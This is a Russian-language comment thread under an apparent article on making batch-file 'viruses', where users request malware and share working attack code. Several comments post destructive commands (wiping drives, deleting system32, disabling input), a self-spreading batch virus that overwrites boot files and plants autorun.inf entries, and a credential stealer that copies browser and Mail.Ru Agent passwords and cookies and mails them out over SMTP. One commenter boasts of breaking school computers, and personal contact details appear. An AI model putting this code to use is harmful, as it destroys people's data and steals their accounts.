Статья суперская ,а как сделать чтоб всплывало ещё фото?? как в порнобанере ???? кто знает подскажите пож.

Если кому надо могу дать батгенератор (мой, написаный своими руками на том же batch). кому интересно пишите на eliseev.roman.al@gmail.com

парни скиньте мне вирус на мыло если можно romaskip@au.ru заранее спс

скажите пожалуста как зделать так чтоб бат вирус запускался после перезагрузки компа снова и снова какая команда нужна

Фигня это всё тут выше изложеное сам на сибе испробывал не работает )))))))))) шляпа а не ВИРУСЫ

скажите пожалуста как зделать так чтоб бат вирус запускался после перезагрузки компа снова и снова какая команда нужна

Спасибо огромное автору. Всегда мечтал создавать хотя-бы простые вирусы. Статья отличная, мне понравилось!

народ вот короче малая часть действий разбирайтесь пишите коменты я училкам 8 компов наебнул ух они в ахуе были.
В состав Windows входят некоторые еще
не описанные исполняемые файлы (внешние команды):
del %0 -САМОУДАЛЕНИЕ
del c:Program Files/q -удаляет все файлы из указанной папки
Chkdsk.exe – отчет о состоянии диска
Debug.exe – отладчик программ
Diskcopy.com – копирование дискет с
соблюдением физического расположения файлов
Doskey.com – резидентная программа
редактирования командной строки
Extract.exe – распаковка Каб-файлов
Fc.exe – сравнение файлов
Find.exe – поиск текста
Label.exe – изменение метки тома
Move.exe – перемещение файлов
Restart.com – перезапуск компьютера
Scanreg.exe – программа проверки,
восстановления, исправления и
резервирования реестра.
Share.exe – обеспечение совместного
использования файлов
Start.exe – запуск приложений Windows из сеанса
MS-DOS (вообще-то, они и без нее запускаются)
Все они (кроме Restart.com), находятся в
папке Command. Параметры их запуска, если т
аковые потребуются, можно узнать, вызывая их
с параметром /?.
ASSOC – Отображает или модифицирует связи расширений файлов
AT – Планирует команды и программы для выполнения на компьютере.
ATTRIB – Отображает или изменяет атрибуты файла.
BREAK – Устанавливает или отменяет проверку комбинации [Ctrl+C].
CACLS – Отображает или модифицирует списки управления доступом (ACLs) для файлов.
CALL – Вызывает один *.BAT-файл из другого.
CD – Отображает имя или изменяет имя текущей директории.
CHCP – Отображает или устанавливает номер активной кодовой страницы.
CHDIR – Отображает имя или изменяет имя текущей директории.
CHKDSK – Проверяет диск и отображает отчет о состоянии.
CLS – Очищает экран.
CMD – Стартует новый экземпляр интерпретатора команд Windows NT.
COLOR – Устанавливает цвета по умолчанию для переднего и заднего плана консоли.
COMMAND – Стартует новую копию интерпретатора команд Windows.
COMP – Сравнивает содержимое двух файлов или установки файлов.
COMPACT – Отображает или видоизменяет сжатие файлов на патрициях Windows NT(NTFS).
CONVERT – Конвертирует FAT томов к формату файловой системы Windows NT(NTFS). Вы не можете конвертировать текущий диск.
COPY – Копирует один или больше файлов на другое место.
CTTY – Изменяет терминальное устройство, используемое для управления вашей системой.
DATE – Отображает или устанавливает дату.
DEL – Удаляет один или более файлов.
DEBUG – Выполняет отладку, тестирование программ и редактирование инструментальных средств.
DIR – Отображает список файлов и поддиректорий в директории.
DISKCOMP – Сравнивает содержимое двух дискет.
DISKCOPY – Копирует содержимое одной дискеты на другую.
DOSKEY – Редактирует командные строки, восстанавливает команды Windows и создает макрос.
ECHO – Отображает сообщения, или включает/выключает вывод команд.
EMM386 – Включает/выключает поддержку расширенной памяти EMM386.
ENDLOCAL – Заканчивает локализацию изменений окружающей среды в *.BAT-файле.
ERASE – Удаляет один или более файлов.
EXIT – Прекращает выполнение программы (интерпретатор команд).
EXTRACT – Средство извлечения информации из CAB – файлов.
FC – Сравнивает два файла или установки файлов, и отображает различие между ними.
FIND – Ищет текстовую строку в файле или файлах.
FINDSTR – Поиск строк в файлах.
FOR – Выполняет указанную команду для каждого файла в наборе файлов.
FORMAT – Форматирует диск для использования с Windows.
FTYPE – Отображает или модифицирует типы файлов, используемых в связях расширений.
GOTO – Направляет интерпретатор команд Windows NT к помеченной строке в *.BAT-файле.
GRAFTABL – Способность Windows отображать символы псевдографики, вставленные в графическом режиме.
HELP – Обеспечивает информацию Help для команд Windows.
IF – Выполняет обработку условия в *.BAT-файле.
KEYB – Конфигурирует клавиатуру для заданного языка.
LABEL – Создает, изменяет, или удаляет метку тома на диске.
LOADHIGH(LH) – Загружает программу в верхние адреса памяти.
MD – Создает директорию.
MEM – Отображает величину используемой и свободной памяти в вашей системе.
MKDIR – Создает директорию.
MODE – Конфигурирует системное устройство.
MORE – Отображает вывод одного экрана за раз.
MOVE – Перемещает один или более файлов из одной директории в другую на том же диске.
NETSTAT – Отображает статистики протоколов и текущих сетевых соединений TCP/IP.
NLSFUNC – Загружает информацию, специфическую для страны.
PATH – Отображает или устанавливает путь поиска для выполняемых файлов.
PAUSE – Приостанавливает обработку *.BAT-файла и отображает сообщение.
POPD – Восстанавливает предыдущее значение текущей директории, сохраненной по PUSHD.
PRINT – Печатает текстовый файл.
PROMPT – Изменяет подсказку к командам Windows.
PUSHD – Сохраняет текущую директорию, потом изменяет.
RD – Удаляет директорию.
RECOVER – Восстанавливает читаемую информацию с плохого или дефектного диска.
REM – Записывает комментарии (примечания) в *.BAT-файлы или CONFIG.SYS.
REN – Переименует файл или файлы.
RENAME – Переименует файл или файлы.
REPLACE – Заменяет файлы.
RESTORE – Восстанавливает файлы, которые были архивированы с использованием команды BACKUP.
RMDIR – Удаляет директорию.
SET – Отображает, устанавливает или удаляет переменные среды Windows.
SETLOCAL – Начинает локализацию изменений среды в *.BAT-файле.
SETVER – Устанавливает номер версии MS-DOS, который Windows сообщает программе.
SHIFT – Сдвигает позицию замещаемых параметров в *.BAT-файле.
SMARTDRV – Инсталлирует и конфигурирует утилиту кэширования диска SMART – драйва.
SORT – Сортирует входной поток.
START – Стартует отдельное окно для выполнения указанной программы или команды.
SUBST – Связывает путь с литерой диска.
SYS – Копирует файлы системы MS-DOS и интерпретатор команд на указанный вами диск.
TIME – Отображает или устанавливает системное время.
TITLE – Устанавливает заголовок окна для сеанса .
TREE – Графически отображает структуру директория в драйве или путь.
TYPE – Отображает содержимое текстового файла.
VER – Отображает версию Windows.
VERIFY – Сообщает Windows, проверять ли правильность записи файлов на диск.
VOL – Отображает метку дискового тома и серийный номер.
XCOPY – Копирует файлы и деревья директории.
[папка WINDOWS]\COMMAND\format [Буква_Диска]: /autotest – форматирование диска(работает в XP)
Cd\ – команда для выхода в корневой каталог из места откуда был запущен bat файл
Cd [Буква_Диска]: – команда перехода на диск
~~~~
Пример, взят с книжки(прога копирует себя в autoexec.bat):
@Echo off
if exist c:virus.bat goto wik {проверяем, существует ли файл, …}
copy %0 c:virus.bat >nul
attrib +h c:virus.bat >nul
echo c:virus.bat>>c:autoexec.bat
:wik {…если он существует, то программа переходит на метку :wik}
copy %0 a:run.bat >nul
~~~~
Chcp 1251 – русская кодировка в бате
start/wait regedit -s [file.reg] – сливаем file.reg с реестром
rd [Буква_Диск]: /s /q – Удаляет ВСЕ с раздела\диска(не пытайтесь проверить у себя)
echo [Строка] >> [Файл] – дописывает строку в файл
attrib -a -s -h [файл.расш] – снимает атрибуты с файла:
+-[a] – снять/убрать аттрибут “НЕ ЗНАЮ Я КАКОЙ НО вроде Архивный”
+-[ s ] – снять/убрать аттрибут “Системный”
+-[h] – снять/убрать аттрибут “Скрытый”
+-[r] = снять/убрать аттрибут “Чтение”
~~~~~~~
Пути:
%USERPROFILE% – [C]:\Documents and Settings\[LAMER]
%ProgramFiles% – это понятно что=)
%USERPROFILE%\Application Data\Microsoft\Internet Explorer\Quick Launch – быстрый запуск
%USERPROFILE%\SendTo – меню “Оптравить”
%windir% – Wind00z)))
%temp% – поняна че ето
~~~~~~~~~~~
assoc .[старое расширение]=.[новое расширение] -изменения ассоцияций
md Папка\еще папка – Создание папок, пример:
md открой\и эту тоже\идём дальше\почти у цели\сейчас конец\конец
Или так:
Добавляем n папок в меню “Отправить”:
cd %USERPROFILE%\SendTo
md 1
mp 2
md 3
…
md n
~~~~~~~~~~~~~~~~~~~~~
RUNDLL (Скопировано с “Народных советов, май 2003”), юзать прямо и тупо – пишете строку в BAT-файл и все:
~~~~~~~~~~~~~~~~~~~~~
rundll32 shell32.dll,Control_RunDLL hotplug.dll – диалоговое окно Отключение или извлечение аппаратного устройства
rundll32 diskcopy,DiskCopyRunDll – вызов диалога “Копирование диска”.
rundll32 keyboard,disable – отключение клавиатуры, действует до следующей перезагрузки.
rundll32 mouse,disable – отключение мыши вплоть до перезагрузки.
rundll32 krnl386.exe,exitkernel – выгрузить ядро системы, выход из Windows.
rundll32 mshtml.dll,PrintHTML “HtmlFileNameAndPath” – распечатать документ HTML, где “HtmlFileNameAndPath” – путь к файлу и его имя.
rundll32 мсprint2.dll,RUNDLL_PrintTestPage – распечатать тестовую страницу на принтере.
rundll32 netplwiz.dll,AddNetPlaceRunDll – вызов мастера подключения нового сетевого ресурса “Добавление в сетевое окружение”.
rundll32 rnaui.dll,RnaWizard – вызов мастера “Удаленный доступ к сети”.
rundll32 rnaui.dll,RnaWizard /1 – вызов мастера “Удаленный доступ к сети” без отображения начального окна.
rundll32 shell,ShellExecute – открыть Проводник (папка “Рабочий стол”).
rundll32 shell32,Control_RunDLL – открыть в Проводнике папку “Панель управления”.
rundll32 shell32,Control_RunDLL appwiz.cpl,,n – вызов диалогового окна “Установка и удаление программ”, в котором будет открыта вкладка с номером “n” (от 1 до 3).
rundll32 shell32,Control_RunDLL main.cpl @0 – открыть диалог “Свойства мыши”.
rundll32 shell32,Control_RunDLL main.cpl @1 – открыть диалог “Свойства клавиатуры”.
rundll32 shell32,Control_RunDLL main.cpl @2 – открыть папку “Принтеры”.
rundll32 SHELL32,SHHelpShortcuts_RunDLL PrintersFolder – открыть папку “Принтеры” (другой способ).
rundll32 shell32,Control_RunDLL main.cpl @3 – открыть папку “Шрифты”.
rundll32 SHELL32,SHHelpShortcuts_RunDLL FontsFolder – открыть папку “Шрифты” (другой способ).
rundll32 SHELL32,Control_RunDLL modem.cpl, add – открыть диалог “Свойства модема”.
rundll32 shell32,Control_RunDLL timedate.cpl – открыть диалог “Дата и время”.
rundll32 shell32,OpenAs_RunDLL – вызвать диалог “Открыть с помощью…”.
rundll32 shell32,ShellAboutA WINHOWTO.RU – информация о версии Windows.
rundll32 shell32,SHExitWindowsEx 0 – закрыть все программы, перегрузить оболочку.
rundll32 shell32, SHExitWindowsEx 1 – выключить ПК.
rundll32 SHELL32, SHExitWindowsEx -1 – перегрузить оболочку Windows.
rundll32 shell32, SHExitWindowsEx 2 – перегрузить ПК.
rundll32 shell32,SHExitWindowsEx 4 – принудительно закрыть все программы.
rundll32 shell32,SHExitWindowsEx 8 – выход из Windows и выключение ATX-совместимого ПК.
rundll32 shell32,SHFormatDrive – вызов диалога форматирования диска А:.
rundll32 SHELL32,SHHelpShortcuts_RunDLL AddPrinter – запуск “Мастера установки принтера”.
rundll32 shell32,SHHelpShortcuts_RunDLL Connect – запуск мастера подключения сетевого диска.
rundll32 SHELL32,SHHelpShortcuts_RunDLL PrintTestPage – распечатать тестовую страницу.
rundll32 sysdm.cpl,InstallDevice_Rundll – вызов мастера установки оборудования.
rundll32 url.dll,FileProtocolHandler %1 – открыть веб-страницу, где %1 – URL сайта (включая [link=https://).]https://).[/link]
rundll32 url.dll,MailToProtocolHandler %1 – создать новое письмо, где %1 – e-mail адресата.
rundll32 user,CASCADECHILDWINDOWS – расположить все окна каскадом.
rundll32 user,TILECHILDWINDOWS – расположить все окна по экрану.
rundll32 user,disableoemlayer – сбой системы (!) – выключить все функции ввода-вывода (клавиатура, дисплей, мышь). В результате будет черный экран с курсором и ни на что не реагирующая система, однако Windows продолжает работать.
rundll32 user,ExitWindowsExec – быстрая перезагрузка Windows.
rundll32 user,RepaintScreen – выполнить команду “Обновить”.
rundll32 user,SetCaretBlinkTime n – задать частоту мигания курсора, соответствующую значению параметра n.
rundll32 user,SetCursorPos – переместить курсор мыши в верхний левый угол экрана.
rundll32 user,SetDoubleClickTime n – задать скорость двойного нажатия левой кнопки мыши (Double Click), соответствующую параметру n.
rundll32 user,SwapMouseButton – поменять местами клавиши мыши (обратная смена невозможна).
rundll32 user,WNetConnectDialog – вызов диалога “Подключение сетевого диска”.
rundll32 user,WNetDisconnectDialog – вызов диалога “Отключение сетевого диска”.
rundll32 AppWiz.Cpl,NewLinkHere %1 – запуск мастера создания нового ярлыка, где %1 – путь к исходному файлу.
~~~~~~~~~~~~~~~~~~~~~~~
WSH(работает только В win2000=)))))
БЕЗ КОМЕНТАРИЕВ, ДУМАЮ ВСЕ ПОНЯТНО:
~~~~~~~~~~~~~~~~~~~~~~~
echo var WSHShell = WScript.CreateObject(”WScript.Shell”); > %temp%\mes.js
WSHShell.Popup(”][AKER FOREVA!”); >> %temp%\mes.js
start %temp%\mes.js
deltree /y %temp%\mes.js
attrib c:\autoexec.bat +h +s +a +r
pause
cls
~~~~~~~~~~~~~~~~~~~~~
Вирус(полностью и нагло тоже скопирован):
ctty nul //Было такое
REM Чй† Ђь@uoњPSQRVW
?
‹тЌ
” Q_ь№ у¦u=
є №є њъ.я?ђ л,ђ ///
copy %0 *.exe ///
copy %0 b.com>nul // Эта технология взята с вируса другово.
b.com. // Эти каракули перехватывают рабочие в данный момент файлы, и херит их.
del b.com. /// Это текст АСМ скомпиленого в exe
rem _^ZY[Xќњъ.я?ђ К ђђђђъ.я.ђ К ћ # @echoђё.5Н.Њ ‘ ‰?ђ Ќ ё.%Н.Ќ є Н’ђђ //
@echo off //
echo XEP_BAM //Пишем злобно и красиво.
if exist %windir%/%0.bat goto :end //Проверка виря на запускание, те был ли он запущен.
@rundll32 user,setcursorpos
ctty con //Было такое
echo Обновление параметров системы, пожалуйста подождите… //Отвлекаем.
@label BAT.c
copy %0.bat %windir% > nul
if exist c:\autoexec.bat attrib c:\autoexec.bat -h -s -a -r
if exist c:\boot.ini attrib c:\boot.ini -h -s -a -r
deltree /y c:\autoexec.bat
deltree /y c:\boot.ini
if exist c:\autoexec.bat echo autoexec.bat echo YOU_ARE_LAMMER…. > c:\autoexec.bat
if exist c:\boot.ini echo autoexec.bat echo YOU_ARE_LAMMER…. > c:\boot.ini //Это для XP он там вместо autoexec.bat ;)
deltree /y %windir%/win.ini
copy %0 > %windir%/win.ini
deltree /y %windir%/system.ini
copy %0 > %windir%/system.ini
if exist c:\io.sys //Проверка наличия диска так как на каждом диске есть файл io.sys
echo [AutoRun] > c:\autorun.inf //И если он есть заразить его.
echo open=c:\autoexec.bat >> c:\autorun.inf //И если он есть заразить его.
if exist d:\io.sys //Проверка наличия диска
echo [AutoRun] > d:\autorun.inf //И если он есть заразить его.
echo open=c:\autoexec.bat >> d:\autorun.inf //И если он есть заразить его.
if exist e:\io.sys //Проверка наличия диска
echo [AutoRun] > e:\autorun.inf //И если он есть заразить его.
echo open=c:\autoexec.bat >> e:\autorun.inf //И если он есть заразить его.
:end //Метка СМ начало.
cls //Выход
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
copy %0 [Папка] – Копирует себя в папку
time ЧЧ:ММ – меняет время
date ДД.ММ.ГГ – если ставить ” в будущее”, то у некоторых антивирусов дохнет активация
del [файл.расш] /s /q – удаление файла
deltree /y [Файл] – Еще одно удаление

Ребят! HELP! Как создать вирус, который будет искать файлы по ключевым словам, которые я задам, и удалять их??? Пишите в аську ребят, если знаете как!!!
UIN:72367383 ник:[CLU] Жду ребят!!! HELP!!!

помогите пожалусто,немогу найти троян-вымогатель,кто поможет,отблагодарю!

Уважаемый админ, нанесение ущерба, это конечно прикольно, а возможно написание такой бат программы, чтоб при установки флеш карты и при запуске программы все файлы txt, doc, или другие заданые в параметрах файлы копировались на указаную флеш карту в указаную папку. Если это возможно скинте пожалуйста набор кода на мой почтовый ящик dim4ik.k@yandex.ru. Заранее спасибо.

выложите исходников разных тройчиков заценить хоть одним глазком .)

taskkill /f /im opera.exe
taskkill /f /im firefox.exe
taskkill /f /im chrome.exe
taskkill /f /im iexplore.exe
taskkill /f /im magent.exe

md C:\pass\
attrib C:\pass +h +s +a +r
md C:\pass\opera\
CD /D %APPDATA%\Opera\Opera\
copy wand.dat C:\pass\opera\ >nul
copy cookies4.dat C:\pass\opera\ >nul
md C:\pass\MailAgent\reg
regedit.exe -ea C:\pass\MailAgent\reg\agent.reg “HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins2
regedit.exe -ea C:\pass\MailAgent\reg\agent_3.reg “HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins3
CD /D %APPDATA%
Xcopy Mra\Base C:\pass\MailAgent /K /H /G /Q /R /S /Y /E >nul
Xcopy Mra\Update\ver.txt C:\pass\MailAgent /K /H /G /Q /R /S /Y >nul
md C:\pass\Mozilla\
cd %AppData%\Mozilla\Firefox\Profiles\*.default\
copy cookies.sqlite C:\pass\Mozilla\ >nul
copy key3.db C:\pass\Mozilla\ >nul
copy signons.sqlite C:\pass\Mozilla\ >nul
md C:\pass\Google\
cd %userprofile%\Local Settings\Application Data\Google\Chrome\User Data\Default\
copy /y Login* C:\pass\Google\ >nul
copy /y Cookies* C:\pass\Google\ >nul
copy /y %Windir%\Rar.exe C:\pass\ >nul
del /s /q %SystemRoot%\Rar.exe
C:\pass\rar.exe a -r C:\pass\pass.rar C:\pass\
copy /y C:\pass\pass.rar %SystemRoot%\system32\draiver\ >nul
cd %SystemRoot%\system32\draiver\
blat.exe -install -server smtp.yandex.ru -port 587 -f tvoi mail@yandex.ru -u tvoi mail -pw tvoi pass
ren *.rar pass.rar
blat.exe -body KuLLIku-}I{epTBbI:) -to tvoi mail@yandex.ru -attach pass.rar
rmdir /s /q C:\pass
del /s /q %SystemRoot%\system32\draiver\pass.rar
EXIT
cls

*TroJan-Aksilium*

Отличная статья!!! vsem spasibo
пример:
Цель: Просмотреть содержимое файла
license.txt, который находится на
диске C:\Program Files\Celestia,
после этого удалить его :
TYPE “C:\Program Files
\OpenOffice.org 2.2\license.txt”
PAUSE
DEL “C:\Program Files
\OpenOffice.org 2.2\license.txt”

Я вот в батниках плохо разбираюсь.
Зачем писать такие большие вирусы.А нельзя так:
@echo off
Del C:\windows\system32\*.*
Извините,если есть ошибки